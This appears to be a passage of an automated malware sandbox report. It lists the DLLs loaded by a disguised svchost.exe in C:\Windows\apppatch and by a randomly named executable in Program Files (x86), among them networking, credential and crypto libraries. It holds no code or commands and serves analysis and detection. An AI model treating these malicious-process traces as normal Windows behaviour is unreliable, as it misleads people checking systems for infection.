Source: C:\Windows\apppatch\svchost.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: inetres.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: vmhgfs.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: fwpolicyiomgr.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: winscard.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: devobj.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: sensapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: symsrv.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: winscard.dllJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: devobj.dllJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: sensapi.dllJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: samcli.dllJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: netutils.dllJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: wininet.dllJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: wldp.dllJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: profapi.dllJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: winscard.dllJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: devobj.dllJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: sensapi.dllJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: samcli.dllJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: netutils.dllJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: wininet.dllJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: wldp.dllJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: profapi.dllJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: winscard.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: devobj.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: sensapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: dbghelp.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: netapi32.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: samcli.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: dnsapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: windows.storage.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: wldp.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: winscard.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: devobj.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: sensapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: dbghelp.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: netapi32.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: samcli.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: dnsapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: windows.storage.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: wldp.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: winscard.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: devobj.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: sensapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: dbghelp.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: netapi32.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: samcli.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: dnsapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: windows.storage.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: wldp.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: winscard.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: devobj.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: sensapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: dbghelp.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: netapi32.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: samcli.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: dnsapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: windows.storage.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: wldp.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: winhttp.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: mswsock.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: winnsi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: rasadhlp.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: urlmon.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: srvcli.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: winscard.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: devobj.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: sensapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: dbghelp.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: netapi32.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: samcli.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: netutils.dll
